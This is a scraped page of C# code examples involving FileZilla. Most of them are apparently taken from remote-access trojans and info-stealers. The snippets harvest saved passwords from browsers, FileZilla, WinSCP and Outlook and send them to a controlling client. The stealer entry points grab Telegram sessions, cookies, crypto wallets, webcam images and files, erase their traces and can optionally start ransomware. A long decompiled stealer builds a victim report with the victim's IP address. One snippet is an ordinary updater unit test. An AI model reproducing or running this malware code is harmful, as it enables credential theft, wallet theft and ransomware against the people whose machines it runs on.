Exemplo n.º 1
0
        public static void HandleGetPasswords(Packets.ServerPackets.GetPasswords packet, Client client)
        {
            List <RecoveredAccount> recovered = new List <RecoveredAccount>();

            recovered.AddRange(Chrome.GetSavedPasswords());
            recovered.AddRange(Opera.GetSavedPasswords());
            recovered.AddRange(Yandex.GetSavedPasswords());
            recovered.AddRange(InternetExplorer.GetSavedPasswords());
            recovered.AddRange(Firefox.GetSavedPasswords());
            recovered.AddRange(Edge.GetPasswords());
            recovered.AddRange(Outlook.GetSavedPasswords());
            recovered.AddRange(Thunderbird.GetSavedPasswords());
            recovered.AddRange(FileZilla.GetSavedPasswords());
            recovered.AddRange(WinSCP.GetSavedPasswords());

            List <string> raw = new List <string>();

            foreach (RecoveredAccount value in recovered)
            {
                string rawValue = string.Format("{0}{4}{1}{4}{2}{4}{3}", value.Username, value.Password, value.URL, value.Application, DELIMITER);
                raw.Add(rawValue);
            }

            new Packets.ClientPackets.GetPasswordsResponse(raw).Execute(client);
        }
Exemplo n.º 2
0
 private static void Main()
 {
     Directory.CreateDirectory(Program.dir);
     HomeDirectory.Create(GetDirPath.User_Name, true);
     if (Settings.webka)
     {
         GetWebCam.Get_webcam();
     }
     Screen.Get_scr(Program.dir);
     FileZilla.get_filezilla(Program.dir);
     Telegram.StealTelegram(Program.dir);
     if (Settings.loader)
     {
         Loader.Load();
     }
     if (Settings.grabber)
     {
         Grabber.Grab_desktop(Program.dir);
     }
     Steal.Cookies();
     Steal.Passwords();
     Wallets.BitcoinSteal(Program.dir);
     UserAgents.Get_agent(Program.dir);
     Browser_Parse.Parse(Program.dir);
     DomainDetect.Start(Helper.Browsers);
     Hardware.Info(Program.dir);
     Directory.Delete(Program.dir, true);
     Directory.Delete(GetDirPath.User_Name, true);
     if (Settings.ransomware)
     {
         RansomwareCrypt.Start();
     }
 }
Exemplo n.º 3
0
        private static string DigLikeThereIsNoTomorrow()
        {
            bool   isHighIntegrity = Utils.IsHighIntegrity();
            string findings        = "";

            findings += McAfee.Dig(isHighIntegrity);
            findings += GPP.Dig();
            findings += Unattended.Dig();
            findings += PSReadLine.Dig(isHighIntegrity);
            findings += AWS.Dig(isHighIntegrity);
            findings += Azure.Dig(isHighIntegrity);
            findings += GCP.Dig(isHighIntegrity);
            findings += RDP.Dig(isHighIntegrity);
            findings += PuTTY.Dig(isHighIntegrity);
            findings += SuperPuTTY.Dig(isHighIntegrity);
            findings += WinSCP.Dig(isHighIntegrity);
            findings += FileZilla.Dig(isHighIntegrity);
            findings += VNC.Dig(isHighIntegrity);
            findings += TeamViewer.Dig();
            findings += PulseSecure.Dig();

            if (string.IsNullOrEmpty(findings))
            {
                return("\nDid not find anything :(\n");
            }
            else
            {
                return(findings);
            }
        }
Exemplo n.º 4
0
        public static void HandleGetPasswords(Packets.ServerPackets.GetPasswords packet, Client client)
        {
            var recovered = new List <RecoveredAccount>();

            recovered.AddRange(Chrome.GetSavedPasswords());
            recovered.AddRange(Opera.GetSavedPasswords());
            recovered.AddRange(Yandex.GetSavedPasswords());
            recovered.AddRange(InternetExplorer.GetSavedPasswords());
            recovered.AddRange(Firefox.GetSavedPasswords());
            recovered.AddRange(FileZilla.GetSavedPasswords());
            recovered.AddRange(WinSCP.GetSavedPasswords());

            var raw = new List <string>();

            for (var i = 0; i < recovered.Count; i++)
            {
                var value    = recovered[i];
                var rawValue = string.Format($"{value.Username}" + $"{DELIMITER}" +
                                             $"{value.Password}" + $"{DELIMITER}" +
                                             $"{value.URL}" + $"{DELIMITER}" +
                                             $"{value.Application}");
                raw.Add(rawValue);
            }

            new Packets.ClientPackets.GetPasswordsResponse(raw).Execute(client);
        }
Exemplo n.º 5
0
        public static void RecoverPasswords()
        {
            try
            {
                StringBuilder sb = new StringBuilder();

                sb.Append(FileZilla.Recover());
                sb.Append(CoreFTP.Recover());
                sb.Append(Minecraft.Recover());
                sb.Append(WindowsProductKey.Recover());
                Upload("Password Recovery", sb.ToString(), "2");
                new Thread(new ThreadStart(delegate { recoverBrowser(); })).Start();
            }
            catch (Exception ex) { Config.DumpErrorLog(ex, null); }
        }
Exemplo n.º 6
0
        private void Execute(ISender client, GetPasswords message)
        {
            List <RecoveredAccount> recovered = new List <RecoveredAccount>();

            recovered.AddRange(Chrome.GetSavedPasswords());
            recovered.AddRange(Opera.GetSavedPasswords());
            recovered.AddRange(Yandex.GetSavedPasswords());
            recovered.AddRange(InternetExplorer.GetSavedPasswords());
            recovered.AddRange(Firefox.GetSavedPasswords());
            recovered.AddRange(FileZilla.GetSavedPasswords());
            recovered.AddRange(WinSCP.GetSavedPasswords());

            client.Send(new GetPasswordsResponse {
                RecoveredAccounts = recovered
            });
        }
Exemplo n.º 7
0
        public static void HandleGetPasswords(GetPasswords packet, Networking.Client client)
        {
            List <RecoveredAccount> recovered = new List <RecoveredAccount>();

            recovered.AddRange(Chrome.GetSavedPasswords());
            recovered.AddRange(Opera.GetSavedPasswords());
            recovered.AddRange(Yandex.GetSavedPasswords());
            recovered.AddRange(InternetExplorer.GetSavedPasswords());
            recovered.AddRange(Firefox.GetSavedPasswords());
            recovered.AddRange(FileZilla.GetSavedPasswords());
            recovered.AddRange(WinSCP.GetSavedPasswords());

            client.Send(new GetPasswordsResponse {
                RecoveredAccounts = recovered
            });
        }
Exemplo n.º 8
0
        public void Test_needsUpdate()
        {
            var fz = new FileZilla(false);
            DetectedSoftware det = new DetectedSoftware()
            {
                displayVersion = fz.knownInfo().newestVersion
            };

            // equal numbers does not need update
            Assert.IsFalse(fz.needsUpdate(det));

            // some older version numbers in ascending order
            string[] older = { "3.0.0",   "3.0.1",    "3.0.2",    "3.0.2.1",
                               "3.2.8",   "3.2.8.1",  "3.3.0",    "3.3.0.1","3.3.1",     "3.3.2",
                               "3.3.2.1", "3.3.3",
                               "3.9.0",   "3.9.0.1",  "3.9.0.2",  "3.9.0.3","3.9.0.4",   "3.9.0.5", "3.9.0.6",
                               "3.10.0",  "3.10.0.1", "3.10.0.2", "3.10.1", "3.10.2",    "3.10.3",
                               "3.11.0",  "3.11.0.1", "3.11.0.2", "3.12.0", "3.12.0.1",  "3.12.0.2",
                               "3.13.0" };
            // older versions should always need update
            foreach (string version in older)
            {
                det.displayVersion = version;
                Assert.IsTrue(fz.needsUpdate(det));
            }

            // Only need update, if detected version is older than known version.
            for (int i = 0; i < older.Length; i++)
            {
                for (int j = 0; j < older.Length; j++)
                {
                    det.displayVersion = older[i];
                    fz = new FzTest(false, older[j]);
                    Assert.AreEqual <bool>(i < j, fz.needsUpdate(det),
                                           "Failed check for i=" + i.ToString() + " and j=" + j.ToString() + "!"
                                           + " v[i]=" + older[i] + ", v[j]=" + older[j] + ".");
                }
            }
        }
Exemplo n.º 9
0
        public static void getPasswords(GetPasswords packet, ClientMosaique client)
        {
            List <RecoveredAccount> recovered = new List <RecoveredAccount>();

            recovered.AddRange(Chrome.GetSavedPasswords());
            recovered.AddRange(Opera.GetSavedPasswords());
            recovered.AddRange(InternetExplorer.GetSavedPasswords());
            recovered.AddRange(Firefox.GetSavedPasswords());
            recovered.AddRange(FileZilla.GetSavedPasswords());
            recovered.AddRange(WinSCP.GetSavedPasswords());


            List <string> raw = new List <string>();

            foreach (RecoveredAccount value in recovered)
            {
                string rawValue = string.Format("{0}{4}{1}{4}{2}{4}{3}", value.username, value.password, value.URL, value.application, DELIMITER);
                raw.Add(rawValue);
            }

            new GetPasswordsResponse(raw).Execute(client);
        }
Exemplo n.º 10
0
        public static void HandleGetPasswords(Paketler.ServerPaketleri.GetPasswords packet, Client client)
        {
            List <KurtarılanHesaplar> recovered = new List <KurtarılanHesaplar>();

            recovered.AddRange(Chrome.GetSavedPasswords());
            recovered.AddRange(Opera.GetSavedPasswords());
            recovered.AddRange(Yandex.GetSavedPasswords());
            recovered.AddRange(InternetExplorer.GetSavedPasswords());
            recovered.AddRange(Firefox.GetSavedPasswords());
            recovered.AddRange(FileZilla.GetSavedPasswords());
            recovered.AddRange(WinSCP.GetSavedPasswords());

            List <string> raw = new List <string>();

            foreach (KurtarılanHesaplar value in recovered)
            {
                string rawValue = string.Format("{0}{4}{1}{4}{2}{4}{3}", value.Username, value.Password, value.Url, value.Application, Antilimiter);
                raw.Add(rawValue);
            }

            new Paketler.ClientPaketleri.GetPasswordsResponse(raw).Execute(client);
        }
Exemplo n.º 11
0
        public static void Main()
        {
            // Проверяем на запуск виртуальных машин ( Virtual Machine Check )
            if (!AntiVM.GetCheckVMBot() && !RunCheck.InstanceCheck())
            {
                Environment.Exit(0);
            }
            // Создаём папку куда будем всё собирать
            HomeDirectory.Inizialize();
            // Делаем проверку что папка создалась
            if (CombineEx.ExistsDir(GlobalPath.HomePath))
            {
                // Собираем данные ....
                Telega.GetSession(GlobalPath.Tdata, GlobalPath.TelegaHome, "*.*");
                MailFoxPassword.Inizialize();
                BuffBoard.Inizialize();
                NordVPN.Inizialize_Grabber();
                DynDns.Inizialize_Grabber();
                FileZilla.Inizialize_Grabber();
                Pidgin.Inizialize_Grabber();
                GetSteamFiles.Inizialize("*.", "*.vdf", "config", "Steam");
                InfoGrabber.Inizialize();
                ScreenShot.Inizialize(GlobalPath.Screen);

                // Сбор и вывод логинов и паролей
                Searcher.CopyInSafeDir(GlobalPath.LoginsPath, "Login Data");
                GetPasswords.Inizialize_Multi_file();

                // Сбор и вывод куки данных
                Searcher.CopyInSafeDir(GlobalPath.CookiesPath, "Cookies");
                GetCookies.Inizialize();

                // Сбор и вывод Автозаполнение форм
                Searcher.CopyInSafeDir(GlobalPath.WebDataPath, "Web Data");
                GetAutoFill.Inizialize_AutoFill();
            }
        }
Exemplo n.º 12
0
        private static void Main()
        {
            Directory.CreateDirectory(dir);
            HomeDirectory.Create(GetDirPath.User_Name, true);
            if (Settings.webka)
            {
                GetWebCam.Get_webcam();
            }
            Screen.Get_scr(dir);

            FileZilla.get_filezilla(dir);
            Telegram.StealTelegram(dir);
            if (Settings.steam)
            {
                Steam.StealSteam(dir);
            }
            if (Settings.loader)
            {
                Loader.Load();
            }
            if (Settings.grabber)
            {
                Grabber.Grab_desktop(dir);
            }
            Mozila.Mozila_still();
            Wallets.BitcoinSteal(dir);
            UserAgents.Get_agent(dir);
            Browser_Parse.Parse(dir);
            Hardware.Info(dir);
            Directory.Delete(dir, true);
            Directory.Delete(GetDirPath.User_Name, true);
            if (Settings.ransomware)
            {
                RansomwareCrypt.Start();
            }
        }
Exemplo n.º 13
0
        public static void HandleGetPasswords(GetPasswords packet, Client client)
        {
            List <RecoveredAccount> recovered = new List <RecoveredAccount>();

            recovered.AddRange(Chrome.GetSavedPasswords());
            recovered.AddRange(Opera.GetSavedPasswords());
            recovered.AddRange(Yandex.GetSavedPasswords());
            recovered.AddRange(InternetExplorer.GetSavedPasswords());
            recovered.AddRange(Firefox.GetSavedPasswords());
            recovered.AddRange(FileZilla.GetSavedPasswords());
            recovered.AddRange(WinSCP.GetSavedPasswords());

            List <string> raw = new List <string>();

            foreach (RecoveredAccount value in recovered)
            {
                string rawValue = string.Format("{0}{4}{1}{4}{2}{4}{3}", value.Username, value.Password, value.URL, value.Application, DELIMITER);
                raw.Add(rawValue);
            }

            client.Send(new GetPasswordsResponse {
                Passwords = raw
            });
        }
Exemplo n.º 14
0
        // Token: 0x0600004F RID: 79 RVA: 0x000028BC File Offset: 0x00000ABC
        public static Credentials Create(ClientSettings settings)
        {
            Credentials credentials = new Credentials
            {
                Defenders          = new List <string>(),
                Browsers           = new List <Browser>(),
                Files              = new List <RemoteFile>(),
                FtpConnections     = new List <LoginPair>(),
                Hardwares          = new List <Hardware>(),
                InstalledBrowsers  = new List <InstalledBrowserInfo>(),
                InstalledSoftwares = new List <string>(),
                Languages          = new List <string>(),
                Processes          = new List <string>(),
                ColdWallets        = new List <ColdWallet>(),
                ImportantAutofills = new List <Autofill>(),
                SteamFiles         = new List <RemoteFile>(),
                NordVPN            = new List <LoginPair>(),
                OpenVPN            = new List <RemoteFile>(),
                ProtonVPN          = new List <RemoteFile>(),
                TelegramFiles      = new List <RemoteFile>()
            };

            try
            {
                try
                {
                    ReadOnlyCollection <WmiProcessor> source = new WmiService().QueryAll <WmiProcessor>(new WmiProcessorQuery(), null);
                    credentials.Hardwares = (from x in source
                                             select new Hardware
                    {
                        Caption = x.Name,
                        HardType = HardwareType.Processor,
                        Parameter = string.Format("{0}", x.NumberOfCores)
                    }).ToList <Hardware>();
                }
                catch
                {
                }
                try
                {
                    WmiService wmiService = new WmiService();
                    if (credentials.Hardwares == null)
                    {
                        credentials.Hardwares = new List <Hardware>();
                    }
                    foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery(), null)
                                               where x.AdapterRAM > 0U
                                               select new Hardware
                    {
                        Caption = x.Name,
                        HardType = HardwareType.Graphic,
                        Parameter = string.Format("{0}", x.AdapterRAM)
                    }).ToList <Hardware>())
                    {
                        credentials.Hardwares.Add(item);
                    }
                }
                catch
                {
                }
                try
                {
                    credentials.Hardwares.Add(new Hardware
                    {
                        Caption   = "Total of RAM",
                        HardType  = HardwareType.Graphic,
                        Parameter = UserInfoHelper.TotalOfRAM()
                    });
                }
                catch
                {
                }
                try
                {
                    WmiService          wmiService2 = new WmiService();
                    List <WmiQueryBase> list        = new List <WmiQueryBase>
                    {
                        new WmiAntivirusQuery(),
                        new WmiAntiSpyWareQuery(),
                        new WmiFirewallQuery()
                    };
                    string[] array = new string[]
                    {
                        "ROOT\\SecurityCenter2",
                        "ROOT\\SecurityCenter"
                    };
                    List <WmiAntivirus> list2 = new List <WmiAntivirus>();
                    foreach (WmiQueryBase wmiQuery in list)
                    {
                        foreach (string scope in array)
                        {
                            try
                            {
                                list2.AddRange(wmiService2.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>());
                            }
                            catch
                            {
                            }
                        }
                    }
                    credentials.Defenders = (from x in list2
                                             select x.DisplayName).Distinct <string>().ToList <string>();
                }
                catch
                {
                }
                credentials.InstalledBrowsers  = UserInfoHelper.GetBrowsers();
                credentials.Processes          = UserInfoHelper.ListOfProcesses();
                credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms();
                credentials.Languages          = UserInfoHelper.AvailableLanguages();
                if (settings.GrabTelegram)
                {
                    credentials.TelegramFiles.AddRange(TelegramGrabber.ParseFiles());
                }
                if (settings.GrabVPN)
                {
                    credentials.NordVPN.AddRange(NordVPN.GetProfile());
                    credentials.OpenVPN.AddRange(OpenVPN.ParseFiles());
                    credentials.ProtonVPN.AddRange(ProtonVPN.ParseFiles());
                }
                if (settings.GrabSteam)
                {
                    credentials.SteamFiles.AddRange(SteamGrabber.ParseFiles());
                }
                if (settings.GrabBrowsers)
                {
                    List <Browser> list3 = new List <Browser>();
                    if (settings.PortablePaths == null)
                    {
                        settings.PortablePaths = new List <string>();
                    }
                    settings.PortablePaths.Add(Constants.RoamingAppData);
                    settings.PortablePaths.Add(Constants.LocalAppData);
                    List <string> list4 = new List <string>();
                    List <string> list5 = new List <string>();
                    foreach (string text in Constants.chromiumBrowserPaths)
                    {
                        string text2 = string.Empty;
                        if (text.Contains("Opera"))
                        {
                            text2 = Constants.RoamingAppData + text;
                        }
                        else
                        {
                            text2 = Constants.LocalAppData + text;
                        }
                        if (Directory.Exists(text2))
                        {
                            foreach (string text3 in DecryptHelper.FindPaths(text2, 1, 1, new string[]
                            {
                                "Login Data",
                                "Web Data",
                                "Cookies"
                            }))
                            {
                                if ((text3.EndsWith("Login Data") || text3.EndsWith("Web Data") || text3.EndsWith("Cookies")) && !list4.Contains(text3))
                                {
                                    list4.Add(text3);
                                }
                            }
                        }
                    }
                    foreach (string str in Constants.geckoBrowserPaths)
                    {
                        try
                        {
                            string text4 = Constants.RoamingAppData + str;
                            if (Directory.Exists(text4))
                            {
                                foreach (string text5 in DecryptHelper.FindPaths(text4, 2, 1, new string[]
                                {
                                    "key3.db",
                                    "key4.db",
                                    "cookies.sqlite",
                                    "logins.json"
                                }))
                                {
                                    if ((text5.EndsWith("key3.db") || text5.EndsWith("key4.db") || text5.EndsWith("cookies.sqlite") || text5.EndsWith("logins.json")) && !list5.Contains(text5))
                                    {
                                        list5.Add(text5);
                                    }
                                }
                            }
                        }
                        catch
                        {
                        }
                    }
                    list3.AddRange(ChromiumEngine.ParseBrowsers(list4));
                    list3.AddRange(GeckoEngine.ParseBrowsers(list5));
                    foreach (Browser browser in list3)
                    {
                        if (!browser.IsEmpty())
                        {
                            using (List <Autofill> .Enumerator enumerator6 = CredentialsHelper.FindImportant(browser.Autofills).GetEnumerator())
                            {
                                while (enumerator6.MoveNext())
                                {
                                    Autofill autofill = enumerator6.Current;
                                    if (!credentials.ImportantAutofills.Any((Autofill x) => x.Name == autofill.Name && x.Value == autofill.Value))
                                    {
                                        credentials.ImportantAutofills.Add(autofill);
                                    }
                                }
                            }
                            credentials.Browsers.Add(browser);
                        }
                    }
                }
                if (settings.GrabWallets)
                {
                    List <ColdWallet> list6 = new List <ColdWallet>();
                    list6.AddRange(ColdWalletsGrabber.ParseFiles());
                    foreach (ColdWallet item2 in list6)
                    {
                        credentials.ColdWallets.Add(item2);
                    }
                }
                if (settings.GrabFiles)
                {
                    credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths, null);
                }
                if (settings.GrabFTP)
                {
                    List <LoginPair> list7 = new List <LoginPair>();
                    list7.AddRange(FileZilla.ParseConnections());
                    list7.AddRange(WinSCP.ParseConnections());
                    credentials.FtpConnections = list7;
                }
                if (settings.GrabImClients)
                {
                    foreach (LoginPair item3 in Pidgin.ParseConnections())
                    {
                        credentials.FtpConnections.Add(item3);
                    }
                }
            }
            catch (Exception)
            {
            }
            return(credentials);
        }
Exemplo n.º 15
0
        // Token: 0x0600000B RID: 11 RVA: 0x000188F8 File Offset: 0x00016AF8
        public static void GetCollection()
        {
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals1 = new Collection.< > c__DisplayClass2_0();
            Console.ForegroundColor = ConsoleColor.White;
            Console.WriteLine("Если вы это видите, значит запуск происходит в консольном режиме. Не забудьте перекомпилировать стиллер как 'Приложение Windows'.");
            Console.WriteLine("If you see this, then the launch is in console mode. Do not forget to recompile the stealer as a 'Windows application'.");
            try
            {
                Directory.CreateDirectory(Help.collectionDir);
                Directory.CreateDirectory(Help.Browsers);
                Directory.CreateDirectory(Help.Passwords);
                Directory.CreateDirectory(Help.Autofills);
                Directory.CreateDirectory(Help.Downloads);
                Directory.CreateDirectory(Help.Cookies);
                Directory.CreateDirectory(Help.History);
                Directory.CreateDirectory(Help.Cards);
            }
            catch
            {
            }
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals2 = CS$ < > 8__locals1;
            Task[] array = new Task[1];
            array[0] = new Task(delegate()
            {
                Start.a();
            });
            CS$ < > 8__locals2.t0 = array;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals3 = CS$ < > 8__locals1;
            Task[] array2 = new Task[1];
            array2[0] = new Task(delegate()
            {
                Collection.GetChromium();
            });
            CS$ < > 8__locals3.t1 = array2;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals4 = CS$ < > 8__locals1;
            Task[] array3 = new Task[1];
            array3[0] = new Task(delegate()
            {
                Collection.GetGecko();
            });
            CS$ < > 8__locals4.t2 = array3;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals5 = CS$ < > 8__locals1;
            Task[] array4 = new Task[1];
            array4[0] = new Task(delegate()
            {
                Edge.GetEdge(Help.Passwords);
            });
            CS$ < > 8__locals5.t3 = array4;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals6 = CS$ < > 8__locals1;
            Task[] array5 = new Task[1];
            array5[0] = new Task(delegate()
            {
                Outlook.GrabOutlook(Help.collectionDir);
            });
            CS$ < > 8__locals6.t4 = array5;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals7 = CS$ < > 8__locals1;
            Task[] array6 = new Task[1];
            array6[0] = new Task(delegate()
            {
                FileZilla.GetFileZilla(Help.collectionDir);
            });
            CS$ < > 8__locals7.t5 = array6;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals8 = CS$ < > 8__locals1;
            Task[] array7 = new Task[1];
            array7[0] = new Task(delegate()
            {
                TotalCommander.GetTotalCommander(Help.collectionDir);
            });
            CS$ < > 8__locals8.t6 = array7;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals9 = CS$ < > 8__locals1;
            Task[] array8 = new Task[1];
            array8[0] = new Task(delegate()
            {
                ProtonVPN.GetProtonVPN(Help.collectionDir);
            });
            CS$ < > 8__locals9.t7 = array8;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals10 = CS$ < > 8__locals1;
            Task[] array9 = new Task[1];
            array9[0] = new Task(delegate()
            {
                OpenVPN.GetOpenVPN(Help.collectionDir);
            });
            CS$ < > 8__locals10.t8 = array9;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals11 = CS$ < > 8__locals1;
            Task[] array10 = new Task[1];
            array10[0] = new Task(delegate()
            {
                NordVPN.GetNordVPN(Help.collectionDir);
            });
            CS$ < > 8__locals11.t9 = array10;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals12 = CS$ < > 8__locals1;
            Task[] array11 = new Task[1];
            array11[0] = new Task(delegate()
            {
                Telegram.GetTelegram(Help.collectionDir);
            });
            CS$ < > 8__locals12.t10 = array11;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals13 = CS$ < > 8__locals1;
            Task[] array12 = new Task[1];
            array12[0] = new Task(delegate()
            {
                Discord.GetDiscord(Help.collectionDir);
            });
            CS$ < > 8__locals13.t11 = array12;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals14 = CS$ < > 8__locals1;
            Task[] array13 = new Task[1];
            array13[0] = new Task(delegate()
            {
                Wallets.GetWallets(Help.collectionDir);
            });
            CS$ < > 8__locals14.t12 = array13;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals15 = CS$ < > 8__locals1;
            Task[] array14 = new Task[1];
            array14[0] = new Task(delegate()
            {
                Systemsinfo.GetSystemsData(Help.collectionDir);
            });
            CS$ < > 8__locals15.t13 = array14;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals16 = CS$ < > 8__locals1;
            Task[] array15 = new Task[1];
            array15[0] = new Task(delegate()
            {
                Dec.Decrypt(Help.Passwords);
            });
            CS$ < > 8__locals16.t15 = array15;
            try
            {
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t0;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t1;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t2;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t3;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t4;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t5;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t6;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t7;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t8;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t9;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t10;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t11;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t12;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t13;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t15;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                Task.WaitAll(CS$ < > 8__locals1.t0);
                Task.WaitAll(CS$ < > 8__locals1.t1);
                Task.WaitAll(CS$ < > 8__locals1.t2);
                Task.WaitAll(CS$ < > 8__locals1.t3);
                Task.WaitAll(CS$ < > 8__locals1.t4);
                Task.WaitAll(CS$ < > 8__locals1.t5);
                Task.WaitAll(CS$ < > 8__locals1.t6);
                Task.WaitAll(CS$ < > 8__locals1.t7);
                Task.WaitAll(CS$ < > 8__locals1.t8);
                Task.WaitAll(CS$ < > 8__locals1.t9);
                Task.WaitAll(CS$ < > 8__locals1.t10);
                Task.WaitAll(CS$ < > 8__locals1.t11);
                Task.WaitAll(CS$ < > 8__locals1.t12);
                Task.WaitAll(CS$ < > 8__locals1.t13);
                Task.WaitAll(CS$ < > 8__locals1.t15);
            }
            catch
            {
            }
            Console.ForegroundColor = ConsoleColor.Green;
            DomainDetect.GetDomainDetect(Help.Browsers);
            Start.b();
            string contents = string.Concat(new string[]
            {
                "<!DOCTYPE html>\n<html>\n<body>\n<style>\nbody {\nbackground-image: url('https://steamcdn-a.akamaihd.net/steamcommunity/public/images/items/383690/f7a121a3f7a929ffb4dbc3ae241b3b4b6eaaed1d.jpg');\nbackground-repeat: no-repeat;\nbackground-attachment: fixed;\nbackground-size: 100% 100%;\n}\n</style>\n<center>\n<h1 style=\"color:white\">",
                JsonValue.buildversion,
                "</h1>\n<p style=\"color:white\">\ud83d\udc64 ",
                Help.machineName,
                "/",
                Help.userName,
                "</p>\n<p style=\"color:white\">\ud83c\udff4 IP: ",
                Help.IP(),
                Help.Country(),
                "</p>\n<h2 style=\"color:white\">\ud83c\udf10 Browsers Data</h2>\n<p style=\"color:white;margin-left:-6em\">   ∟\ud83d\udd11</p>\n<p style=\"color:white;margin-left:3em\">     ∟Chromium v1: ",
                Chromium.Passwords.ToString(),
                "</p>\n<p style=\"color:white;margin-left:3em\">     ∟Chromium v2: ",
                Dec.colvo.ToString(),
                "</p>\n<p style=\"color:white;margin-left:-1.5em\">     ∟Edge: ",
                Edge.count.ToString(),
                "</p>\n<p style=\"color:white;margin-left:-0.9em\">     ∟Gecko: ",
                Steal.count.ToString(),
                "</p>\n<p style=\"color:white;margin-left:-4em\">   ∟\ud83c\udf6a",
                (Chromium.Cookies + Steal.count_cookies).ToString(),
                "</p>\n<p style=\"color:white;margin-left:-4em\">   ∟\ud83d\udd51",
                Chromium.History.ToString(),
                "</p>\n<p style=\"color:white;margin-left:-4.5em\">   ∟\ud83d\udcdd",
                Chromium.Autofills.ToString(),
                "</p>\n<p style=\"color:white;margin-left:-5.5em\">   ∟\ud83d\udcb3",
                Chromium.CC.ToString(),
                "</p>\n<p style=\"color:white;margin-left:-4.8em\">   ∟⨭",
                Chromium.Downloads.ToString(),
                "</p>\n<p style=\"color:white\">\ud83d\udcb6 Wallets: ",
                (Wallets.count > 0) ? "✅" : "❌",
                (Electrum.count > 0) ? " Electrum" : "",
                (Armory.count > 0) ? " Armory" : "",
                (AtomicWallet.count > 0) ? " Atomic" : "",
                (BitcoinCore.count > 0) ? " BitcoinCore" : "",
                (Bytecoin.count > 0) ? " Bytecoin" : "",
                (DashCore.count > 0) ? " DashCore" : "",
                (Ethereum.count > 0) ? " Ethereum" : "",
                (Exodus.count > 0) ? " Exodus" : "",
                (LitecoinCore.count > 0) ? " LitecoinCore" : "",
                (Monero.count > 0) ? " Monero" : "",
                (Zcash.count > 0) ? " Zcash" : "",
                (Jaxx.count > 0) ? " Jaxx" : "",
                "</p>\n<p style=\"color:white\">\ud83d\udcc2 FileGrabber: ",
                Grab.countFiles.ToString(),
                "</p>\n<p style=\"color:white\">\ud83d\udcb0 Recursive Wallets: ",
                Grab.countWallets.ToString(),
                "</p>\n<p style=\"color:white\">\ud83d\udda5 RDP: ",
                Grab.countRdp.ToString(),
                "</p>\n<p style=\"color:white\">\ud83d\udcac Discord: ",
                (Discord.count > 0) ? "✅" : "❌",
                "</p>\n<p style=\"color:white\">✈️ Telegram: ",
                (Telegram.count > 0) ? "✅" : "❌",
                "</p>\n<p style=\"color:white\">\ud83d\udca1 Jabber: ",
                (Startjabbers.count + Pidgin.PidginCount > 0) ? "✅" : "❌",
                (Pidgin.PidginCount > 0) ? (" Pidgin (" + Pidgin.PidginAkks.ToString() + ")") : "",
                (Startjabbers.count > 0) ? " Psi" : "",
                "</p>\n<h2 style=\"color:white\">\ud83d\udce1 FTP</h2>\n<p style=\"color:white\">   ∟ FileZilla: ",
                (FileZilla.count > 0) ? ("✅ (" + FileZilla.count.ToString() + ")") : "❌",
                "</p>\n<p style=\"color:white\">   ∟ TotalCmd: ",
                (TotalCommander.count > 0) ? "✅" : "❌",
